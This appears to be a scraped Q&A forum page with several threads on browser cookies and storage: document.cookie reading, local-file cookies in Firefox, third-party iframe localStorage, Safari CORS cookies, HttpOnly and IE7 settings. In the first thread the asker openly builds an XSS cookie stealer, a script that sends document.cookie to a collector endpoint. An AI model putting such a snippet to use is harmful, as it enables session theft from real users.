I have to read cookies using JavaScript. I am using the document.cookie to do that same. But the method works on Google Chrome only, and not on Firefox and IE 8/9. All the web-pages also show document.cookie as a way to do it.
How can I fetch cookies in Firefox and IE using JavaScript?
Thanks
UPDATE
I tested my code on localhost. On testing the code online on blogspot.com, it didn't even work on chrome.
Any ways, here's the HTML code:
<script type="text/javascript">
function sendCookies(){
document.location='http://localhost/xss/getcookies.php?cookie='+escape(document.cookie);
}
</script>
<a onclick="sendCookies()" href="#">
click here </a> to know about XSS attack.
While debugging document.cookie in browsers, it shows value in Chrome only. If I replace localhost link a online link, document.cookie is empty, even on Chrome.
Your possible guess is right. This is a sort of cross-site scripting attack.
Any help on this code will be of good use to me?
UPDATE 2:
Here's the link to the video which shows how to perform XSS attack:
How to perform XSS attack
have you tried using jquery-cookie? https://github.com/carhartl/jquery-cookie
Also, keep in mind that you cannot read http-only cookies with javascript. Though, if you can read the cookies in chrome, it is not an http-only cookie. You can check if a cookie is http-only by going to the resources tab in the debug console in chrome and checking if the HTTP column has a tick mark for the cookie.
Related
I store some info in cookies in my Javascript code. I have had no problem to set and read them from local drive until Firefox Quantum installed.
Now it seems that the cookies are set (been checked among the cookies), but cannot be read if I open the html file. The document.cookie.length value is always zero. Yet if I set the cookies and refresh the browser (or open the file again not closing the first file) the cookies can be read.
So far Firefox stored and read cookies all right using file:///, but this twist is new for me. Some setting has to be changed, I guess.
Can anybody tell me a solution, how to allow to read the cookies again from local drive?
Thank you.
Firefox Quantum (as with Google Chrome and others) has disabled storing cookies for local files due to security issues and other problems. The HTML5 web storage commands are taking over what used to be done with cookies for both server and local web pages. See "https://www.w3schools.com/html/html5_webstorage.asp"
I'm trying to store a value on another domain using an iframe (actually, I'm using the xauth library at http://xauth.org/info/). However, when I try to store anything using Chrome, it comes back with "QUOTA_EXCEEDED_ERR: DOM Exception 22", which I've come to recognize as an access error. I've mocked up a couple of very simple pages below to duplicate the effect:
File 1.html:
<html>
<head/>
<iframe src='http://127.0.0.1/2.html' />
</html>
File 2.html:
<html>
<head/>
<script>
console.log(localStorage);
localStorage.setItem('test', '123');
</script>
</html>
If I place both of these on my local server and access localhost/1.html it embeds a frame from 127.0.0.1 (which Chrome considers a separate domain), and I get the same access error as above. At a guess, it looks like even though I'm embedding an iframe from another domain, and the script inside that iframe references the localStorage for that domain properly (as I can see with the console.log(localStorage) line), the permissions for writing to localStorage are coming from the top page's domain.
In short, it looks like no iframe can write to localStorage in Chrome. Does anybody know if there's a way around this particular security "feature"? Or am I doing something wrong?
The problem only occurs when third-party cookies are disabled. Newer versions of Firefox and Opera are also blocking it. In IE and Edge it is still possible although third-party cookies are disabled. If the localStorage would not be blocked in the iframe, a web tracker could simply include a iframe, read the cookie, send it to the parent script, and then send it to the server.
The reason why this is not blocked in IE and Edge is that these browser allow websites to send third-party cookies, which were previously set as first-party cookies, to the server although third-party cookies are blocked. For example, if a user visits facebook on a regular basis, he gets first-party cookies from facebook. When he then visits other websites with facebook's share button, facebook can track him although third-party cookies are disabled. I really do not know why IE and Edge do not block third-party cookie sending, but I would not use these browsers anyway.
The errors the browsers show when third-party cookies are disabled:
Chrome and Opera: Uncaught DOMException: Failed to read the 'localStorage' property from 'Window': Access is denied for this document.
Firefox: SecurityError: The operation is insecure.
IE and Edge: No error, access to localStorage in iframe is possible although third-party cookies are disabled.
So in conclusion, it is not possible to bypass this security feature (in Chrome, Firefox, Opera) and this is good in order to ensure users' privacy.
This is an old post, but if someone else see it- you can use postMessage
https://stackoverflow.com/a/40469196/4836581
Well, localStorage is domain-based and there is no reason for your example code to fail. What it actually does is to set the test item to 123 for 127.0.0.1 whereas it will leave the localhost localStorage empty.
This might not be the answer to your initial problem of QUOTA_EXCEEDED_ERR, but just try to switch to private browsing on Chrome (Ctrl+Shift+N) to see if you still have the error. Without further information on what you were initially doing, I can't tell much but I believe that quota exceeded means what it means...
And I think Chrome's quota is 2.5mb unlike FF which has 5mb of localStorage quota.
I followed the example: http://arunranga.com/examples/access-control/credentialedRequest.html
from this page: http://arunranga.com/examples/access-control/
The example work in Firefox, but not Safari, anyone have tried in implementing CORS cross domain cookie handling, and being success in Safari?
Thanks.
Safari also blocks cookies from sites that haven't been visited directly. You can see in the security settings. It's default setting is Accept cookies: "Only from sites I visit".
This will help get you started.
Setting cross-domain cookies in Safari
I have jsonp working in safari using methods in the above link. So assumed that the cookie would work in the CORS context, but at this stage it doesn't seem to be working. Also, changing the security setting seems to have no effect.
Safari might demand a stricter set of headers to be returned?
This sounds like a Safari bug. I just verified that cross-domain cookies aren't being set in Safari. Cross-domain cookies are working in Chrome, so this may be fixed in WebKit and the latest hasn't made it to Safari yet. I haven't seen a Safari or WebKit bug report about this.
I encountered this with API/UI apps on different subdomains of Heroku, like my-api.herokuapp.com and my-ui.herokuapp.com, session cookie was set for my-api.herokuapp.com. Even visiting my-api.herokuapp.com didn't seem to help Safari in this case with its default 'Only from sites I visit' policy #23inhouse mentioned: http://content.screencast.com/users/artemv/folders/Jing/media/4dfc08d7-0e9c-483f-a272-bbe91549ea95/00000759.png.
However, Safari worked just fine when we assigned a custom domain to these apps and it became my-api.mydomain.com and my-ui.mydomain.com - so it looks like Safari has particularly low trust to popular hosters' subdomains. No direct visit to my-api.mydomain.com was needed in this case.
I have a URI here in which a simple document.cookie query through the console is resulting in three cookies being displayed. I verified this with trivial code such as the following as well:
var cookies = document.cookie.split(';');
console.log(cookies.length);
The variable cookies does indeed come out to the number 3. Web Developer on the other hand is indicating that a grand total of 8 cookies are in use.
I'm slightly confused to believe which is inaccurate. I believe the best solution might involve just reiterating the code above without the influence of Firebug. However, I was wondering if someone might suggest a more clever alternative to decipher which tool is giving me the inaccurate information.
One reason might be that the other 5 cookies are HTTPONLY:
http://msdn.microsoft.com/en-us/library/ms533046.aspx
If the HttpOnly attribute is included
in the response header, the cookie is
still sent when the user browses to a
Web site in the valid domain. The
cookie cannot be accessed through
script in Internet Explorer 6 SP1,
even by the Web site that set the
cookie in the first place. This means
that even if a cross-site scripting
bug exists, and the user is tricked
into clicking a link that exploits
this bug, Windows Internet Explorer
does not send the cookie to a third
party. The information is safe.
Firefox also respects this flag (as of v2.0.0.5).
I'm pretty sure the web developer toolbar shows cookies for domain and sub-domains.
So it will show cookies for
abc.xyz.com
xyz.com
whether you are on a page of either domain
I've tried disabling cookies in Internet Explorer 7, I've changed the settings under Internet Options->Privacy and this did nothing, when I reloaded the page.
I read somewhere that you need to restart IE7, than physically delete the Internet cache and cookie files first, and finally reload your page to disable cookies. (I also had no luck with this, cookies are still present, as evidenced by my script still reacting as though cookies are loaded.)
Um I guess I should also note that IE asks me if I wish to enable an ActiveX component when I access the page I have created. I don't have any ActiveX components on the page, but I'll take this to mean I have Javascript on the page.
I know my script works because when I disable cookies in other browsers (FF3 and Safari) it works fine.
Is there something I'm missing here?
IE's cookie settings control panel applies to the Internet Zone only.
To disable cookies in other zones, use the IE8 developer toolbar (hit F12) and choose "Disable Cookies" from the menu.
Does what's explained over here and here help?